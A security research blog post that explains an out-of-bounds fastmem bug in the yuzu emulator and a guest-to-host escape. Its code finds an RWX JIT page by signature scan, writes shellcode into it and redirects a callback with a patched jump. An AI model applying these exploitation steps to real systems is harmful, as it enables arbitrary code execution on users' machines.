attacking yuzu: escaping the emulator

Yuzu is (was?) a Nintendo Switch emulator written in C++ whose main strength was its performance. The team made some sacrifices to achieve that performance, specifically with respect to security. Here we explore the yuzu emulator and attempt to escape it and execute code on the host.

This post is by no means intended to attack the yuzu developers. They built an amazing piece of software where speed was the most important aspect. Given the context (you’re supposed to run only your own dumps of games in the emulator), security was probably not something they wanted to focus on.

context

We won’t go deep on Nintendo Switch internals. The important part is that the Switch uses an ARM CPU as its main processor, which means yuzu must emulate ARM. This is done by their own JIT, called Dynarmic.

Normally, if you were writing your own interpreter, you’d have some code like the following:

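// Slow path: every guest store pays for a lookup before it touches memory.
void WriteMemory8(uint64_t vaddr, uint8_t value) {
    if (IsMapped(vaddr)) {  // pseudocode: look vaddr up in the guest page table
        GetMappedRegion(vaddr).Write8(vaddr, value);
    } else {
        Exception("Writing to unmapped memory");
    }
}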

Each time you encounter an instruction that causes a write, you’d call this function. You might have noticed that this is slow for a single memory write: it needs extra memory reads to check whether vaddr is mapped, so it has at least double the memory latency. Considering that an emulated program might read and write millions of times during a frame, this is a very hot path.

To avoid this, emulators have a feature commonly called fastmem. The idea is to map the whole address space of the target device into the host process. You can do this lazily, without actually claiming all of that memory; on Linux you’d use the mmap() syscall with MAP_NORESERVE and MAP_ANONYMOUS. The Nintendo Switch has a 39-bit virtual address space, which is 512 GiB.

Here is where you might get an idea: what happens if we try to write outside that virtual address space? To find out, we wrote a Nintendo Switch homebrew using devkitPro that writes to an invalid memory address, and loaded it in yuzu:
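To make the fastmem idea concrete, here is a minimal sketch for a Linux host. The names reserve_guest_space, fastmem_write8 and fastmem_read8 are made up for illustration and are not yuzu or Dynarmic functions. It also maps the whole region read/write for simplicity, which is an assumption of the sketch: a real emulator would only back the pages the guest has actually mapped and handle faults for the rest.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

/* Reserve 2^bits bytes of host address space without committing memory.
 * Pages are only backed by physical memory once they are first touched.
 * Returns NULL if the reservation fails. (Hypothetical helper.) */
uint8_t *reserve_guest_space(unsigned bits) {
    assert(bits < sizeof(size_t) * 8);
    size_t size = (size_t)1 << bits;
    void *base = mmap(NULL, size, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
    return base == MAP_FAILED ? NULL : (uint8_t *)base;
}

/* With fastmem a guest store is a single host store: base + vaddr.
 * Note that nothing here checks that vaddr is inside the reservation. */
void fastmem_write8(uint8_t *base, uint64_t vaddr, uint8_t value) {
    base[vaddr] = value;
}

uint8_t fastmem_read8(const uint8_t *base, uint64_t vaddr) {
    return base[vaddr];
}
```

Calling reserve_guest_space(39) would reserve the Switch's full 512 GiB; whether that succeeds depends on the host's overcommit settings. Compared to the WriteMemory8 version above, the lookup is gone entirely, which is exactly why this path is fast and why it is dangerous if vaddr is never validated.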

#include <stdint.h>
#include <stdlib.h>

void write64(uint64_t target, uint64_t value) {
    uint64_t *ptr = (uint64_t*) target;
    *ptr = value;
}

int main(int argc, char* argv[]) {
    write64(0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef);
    return 0;
}

Sure enough, opening this in yuzu with a debugger attached, we hit a segmentation fault:

   0x7f7d841e3317                  mov    QWORD PTR [r15], 0x0
   0x7f7d841e331e                  movabs rax, 0xdeadbeefdeadbeef
   0x7f7d841e3328                  mov    r12d, 0xdeadbeef
-> 0x7f7d841e332e                  mov    QWORD PTR [r13+rax*1+0x0], r12
   0x7f7d841e3333                  mov    rax, QWORD PTR [r15+0xf0]
   0x7f7d841e333a                  mov    QWORD PTR [r15+0x100], rax
   0x7f7d841e3341                  jmp    0x7f7d841bc920
   0x7f7d841e3346                  int3
   0x7f7d841e3347                  call   0x7f7d8400b3d0

Here r13 points at the start of the fastmem mapping, which during this execution was 0x00007f7ee7e00000, and rax holds 0xdeadbeefdeadbeef, the address we wrote to from inside our homebrew. We therefore end up writing to 0xdeae3e6ec68dbeef in the host, a very invalid address.
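The arithmetic behind that faulting address can be reproduced with a few lines of C. This is only a sketch: fastmem_host_address and is_canonical48 are illustrative names, and the canonical check assumes an x86-64 host with 48-bit virtual addresses (4-level paging).

```c
#include <stdbool.h>
#include <stdint.h>

/* Host address touched by `mov [r13 + rax], r12`:
 * r13 is the fastmem base, rax the guest address.
 * Unsigned addition wraps modulo 2^64, just like the CPU does. */
uint64_t fastmem_host_address(uint64_t fastmem_base, uint64_t guest_vaddr) {
    return fastmem_base + guest_vaddr;
}

/* With 48-bit virtual addresses, bits 63..47 must all be equal.
 * Anything else is non-canonical and faults on access. */
bool is_canonical48(uint64_t addr) {
    uint64_t top = addr >> 47; /* the 17 uppermost bits */
    return top == 0 || top == 0x1ffff;
}
```

Plugging in the values from the debugger session, fastmem_host_address(0x00007f7ee7e00000, 0xdeadbeefdeadbeef) gives 0xdeae3e6ec68dbeef, which is_canonical48 rejects. That is why the write crashes instead of silently landing somewhere.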

why does this happen?

If you go into the Dynarmic source code, there is a function called EmitFastmemVAddr that computes the host address of a fastmem access. It does the following:

template<>
[[maybe_unused]] Xbyak::RegExp EmitFastmemVAddr<A64EmitContext>(BlockOfCode& code, A64EmitContext& ctx, Xbyak::Label& abort, Xbyak::Reg64 vaddr, bool& require_abort_handling, std::optional<Xbyak::Reg64> tmp) {
    const size_t unused_top_bits = 64 - ctx.conf.fastmem_address_space_bits;
    if (unused_top_bits == 0) {
        return r13 + vaddr;
    } else if (ctx.conf.silently_mirror_fastmem) {
        // some case
    } else {
        // some other case
    }
}

Here the r13 register already contains the base address of the fastmem region. In the first case there is no bounds check and vaddr is added directly. The other cases have extra checks, but they are not relevant here: if you look at how yuzu configures Dynarmic, you might notice something:

// Curated optimizations
if (Settings::values.cpu_accuracy.GetValue() == Settings::CpuAccuracy::Auto) {
    config.unsafe_optimizations = true;
    config.optimizations |= Dynarmic::OptimizationFlag::Unsafe_UnfuseFMA;
 -> config.fastmem_address_space_bits = 64;
    config.optimizations |= Dynarmic::OptimizationFlag::Unsafe_IgnoreGlobalMonitor;
}

This means that by default yuzu has unused_top_bits = 0, which translates to no bounds checking when using fastmem. We now have a relative r/w primitive, based at the start of the fastmem region, that reaches the whole address space of the host.
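To see what the setting changes, here is a simplified model of the three branches in plain C. This is not Dynarmic's code (the real function emits x86 instructions); the struct and function names are invented for the sketch, and the behaviour of the two elided branches is my reading of the option names: mirroring masks off the unused top bits, the other branch bails out to a slow path if any of them are set.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef struct {
    unsigned address_space_bits; /* models fastmem_address_space_bits */
    bool silently_mirror;        /* models silently_mirror_fastmem */
} FastmemModel;

/* Returns true and stores the host address on the fast path.
 * Returns false where the generated code would jump to `abort`. */
bool fastmem_translate(FastmemModel cfg, uint64_t base, uint64_t vaddr,
                       uint64_t *host) {
    assert(cfg.address_space_bits >= 1 && cfg.address_space_bits <= 64);
    unsigned unused_top_bits = 64 - cfg.address_space_bits;
    if (unused_top_bits != 0) {
        uint64_t mask = (UINT64_C(1) << cfg.address_space_bits) - 1;
        if (cfg.silently_mirror) {
            vaddr &= mask;               /* wrap into the guest space */
        } else if ((vaddr & ~mask) != 0) {
            return false;                /* out of range: take slow path */
        }
    }
    *host = base + vaddr;                /* 64 bits: no check at all */
    return true;
}

/* The guest address that makes an unchecked access land on host_target. */
uint64_t guest_vaddr_for_host(uint64_t base, uint64_t host_target) {
    return host_target - base;           /* wraps modulo 2^64 */
}
```

With address_space_bits set to 39 the 0xdeadbeefdeadbeef write is either masked or rejected. With 64, any host address is reachable: guest_vaddr_for_host just subtracts the base, so targets below the fastmem region become huge "negative" guest addresses.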

Is this enough to achieve arbitrary code execution on the host with modern mitigations? The answer is yes.

exploitation

Normally you’d do the following:

Defeat ASLR.
Overwrite a GOT entry to pivot into a ROP chain.

However, this target is special. Because it is an emulator that uses a JIT, it needs to write its generated machine code somewhere, which means there are RWX pages in the address space! So now the plan would be:

Find some RWX page.
Write shellcode to that RWX page.
Redirect code execution into that shellcode.

To find the RWX page where execution is happening, it’s enough to look at where the segmentation fault we found earlier happens. In my experiments the fastmem area is mapped between 0x100000000 and 0x200000000 bytes after the start of one of the JIT arenas.

This is still a lot of memory to look through, and what are we looking for? A key insight was to not look at the whole memory region but only at the values at the start of each memory page, that is, at multiples of 0x1000. The first bytes of the RWX page we are targeting always contain the value 0x1f0f66cc. This is because in Dynarmic each RWX mapping has an associated ConstantPool at the start, which it seems to use to handle constant values in JIT’ted code.

ConstantPool::ConstantPool(BlockOfCode& code, size_t size)
        : code(code), insertion_point(0) {
    code.EnsureMemoryCommitted(align_size + size);
    code.int3();
    code.align(align_size);
    pool = std::span<ConstantT>(
        reinterpret_cast<ConstantT*>(code.AllocateFromCodeSpace(size)), size / align_size);
}

The int3 instruction corresponds to the 0xcc low byte of 0x1f0f66cc; the remaining bytes (66 0f 1f) are presumably the start of the multi-byte NOP padding emitted by code.align. In our case these initial bytes act almost like a hash: if a memory page starts with that value, it’s almost certainly the RWX mapping we are looking for. More importantly, we only need to read once every 0x1000 bytes, which means 0x100000 reads in the worst case. With this we can write some code to find the offset to this RWX page:

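uint64_t offset_to_rwx = 0x0;
// Walk backwards from the fastmem base one page at a time,
// starting 0x100000000 bytes below it.
for (uint64_t i = 0x100000; ; i++) {
    uint64_t offset = -(i*0x1000);  // negative offset, wraps modulo 2^64
    uint32_t val = read32(offset);  // read32: the load counterpart of write64
    if (val == 0x1f0f66cc) {
        offset_to_rwx = offset;
        break;
    }
}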
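The same scan can be tried out safely on an ordinary buffer. The sketch below is a host-side simulation rather than part of the exploit: load_le32 and find_signature_page are illustrative names, and the buffer stands in for the memory below the fastmem base.

```c
#include <stddef.h>
#include <stdint.h>

#define SCAN_PAGE_SIZE 0x1000u
#define POOL_SIGNATURE 0x1f0f66ccu

/* Assemble four bytes into a little-endian 32-bit value, the way a
 * 32-bit load sees them: cc 66 0f 1f reads back as 0x1f0f66cc. */
uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Check only the first four bytes of every page.
 * Returns the byte offset of the first matching page, or -1. */
ptrdiff_t find_signature_page(const uint8_t *buf, size_t len) {
    for (size_t off = 0; off + 4 <= len; off += SCAN_PAGE_SIZE) {
        if (load_le32(buf + off) == POOL_SIGNATURE) {
            return (ptrdiff_t)off;
        }
    }
    return -1;
}
```

Only page starts are inspected, so a copy of the signature in the middle of a page is ignored. That is also where the worst-case figure comes from: a 0x100000000-byte window divided by 0x1000 bytes per page is 0x100000 probes.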

With this offset we can now write some shellcode to this location, crossing our fingers that these constants are not that important… Even if they are important, the memory mapping is pretty big, so you can probably find some unused space to write the shellcode to.

size_t count = sizeof(shellcode) / 8;
for (size_t i = 0; i < count; i++) {
    write64(offset_to_rwx + i * 8, shellcode[i]);
}
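The loop above assumes shellcode is already an array of 64-bit words, since the write primitive stores 8 bytes at a time. If you start from raw bytes, something has to pack them first. A minimal sketch, with pack_code_words as a hypothetical helper and 0x90 (the x86 NOP) as an assumed padding byte:

```c
#include <stddef.h>
#include <stdint.h>

/* Pack n bytes into little-endian 64-bit words, padding the final
 * word with 0x90 (x86 NOP). `out` needs room for (n + 7) / 8 words.
 * Returns the number of words written. */
size_t pack_code_words(const uint8_t *bytes, size_t n, uint64_t *out) {
    size_t words = (n + 7) / 8;
    for (size_t w = 0; w < words; w++) {
        uint64_t word = 0;
        for (size_t b = 0; b < 8; b++) {
            size_t idx = w * 8 + b;
            uint8_t byte = idx < n ? bytes[idx] : 0x90;
            word |= (uint64_t)byte << (8 * b); /* byte b is bits 8b..8b+7 */
        }
        out[w] = word;
    }
    return words;
}
```

Padding with NOPs rather than zeros means that execution running past the last real instruction in the final word hits harmless filler instead of whatever 00 00 happens to decode to.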

Now we need to find out how to redirect code execution. This was actually not that hard now that we know where our JIT’ted code is placed. What happens after a write in JIT’ted code? Execution must eventually come back to yuzu, which Dynarmic does by jumping to some callback inside the RWX block after writing the value. If you look at our first segmentation fault again, you might now notice the jump instruction after the write:

   0x7f7d841e3317                  mov    QWORD PTR [r15], 0x0
   0x7f7d841e331e                  movabs rax, 0xdeadbeefdeadbeef
   0x7f7d841e3328                  mov    r12d, 0xdeadbeef
   0x7f7d841e332e                  mov    QWORD PTR [r13+rax*1+0x0], r12
   0x7f7d841e3333                  mov    rax, QWORD PTR [r15+0xf0]
   0x7f7d841e333a                  mov    QWORD PTR [r15+0x100], rax
-> 0x7f7d841e3341                  jmp    0x7f7d841bc920
   0x7f7d841e3346                  int3
   0x7f7d841e3347                  call   0x7f7d8400b3d0

The jump goes to a callback located +0x3be920 from the start of the memory mapping, and this offset is consistent across writes and executions. With this we can overwrite the callback code at +0x3be920 with a jump into our shellcode.

uint64_t jmp_to_shellcode = 0x909090ffc416dbe9;
write64(offset_to_rwx + 0x3be920, jmp_to_shellcode);
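The magic constant is less mysterious than it looks. Read as little-endian bytes it is e9 db 16 c4 ff 90 90 90: a 5-byte jmp rel32 followed by three NOPs. The displacement is relative to the end of the jump instruction, so from +0x3be920 it lands exactly at offset 0 of the mapping, where the shellcode was written. A small sketch that rebuilds it (encode_jmp_rel32_padded is an illustrative name, not something from the exploit):

```c
#include <assert.h>
#include <stdint.h>

/* Encode `jmp rel32` (opcode 0xe9) from from_offset to to_offset,
 * padded with three NOPs so it fills one 64-bit write.
 * Both offsets are relative to the start of the same mapping. */
uint64_t encode_jmp_rel32_padded(uint64_t from_offset, uint64_t to_offset) {
    /* rel32 counts from the end of the 5-byte instruction. */
    int64_t delta = (int64_t)(to_offset - (from_offset + 5));
    assert(delta >= INT32_MIN && delta <= INT32_MAX);
    uint32_t rel32 = (uint32_t)delta;

    uint64_t word = 0xe9;                /* byte 0: opcode */
    word |= (uint64_t)rel32 << 8;        /* bytes 1..4: displacement */
    word |= UINT64_C(0x909090) << 40;    /* bytes 5..7: nop padding */
    return word;
}
```

encode_jmp_rel32_padded(0x3be920, 0) reproduces 0x909090ffc416dbe9. If the shellcode were placed somewhere other than the start of the mapping, only the second argument would change.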

Our exploit is now complete; all that remains is to compile it and run it in yuzu.

final thoughts

This is a bug I discovered a couple of years ago but didn’t find interesting enough to publish. Now that yuzu is dead, I felt the urge to go back and explore it again. Because yuzu has been DMCA’d, development has stopped, and the last source code and builds used here had to be obtained from backup websites. For further reading on yuzu internals, specifically related to fastmem (and why it’s so important), I highly recommend taking a look at “New Feature Release - Fastmem Support”.

This exploit is probably not directly usable elsewhere, even on other Linux distros, since it is highly dependent on how the kernel assigns memory mappings. It was written on Arch Linux, and in testing it worked without changes in an Ubuntu VM, but your mileage may vary. There is probably a better way of exploiting this bug, by first leaking ASLR and then either modifying the GOT or abusing the RWX memory mappings, but at the time I didn’t see a better alternative, so we ended up with this rather unconventional exploit instead.

Disclaimer: This issue was reported to the yuzu developers at the time, but addressing it would have come with significant performance costs and minimal benefits. I agree: the threat model here is virtually nonexistent, since yuzu is intended for use with trusted game dumps that you create yourself.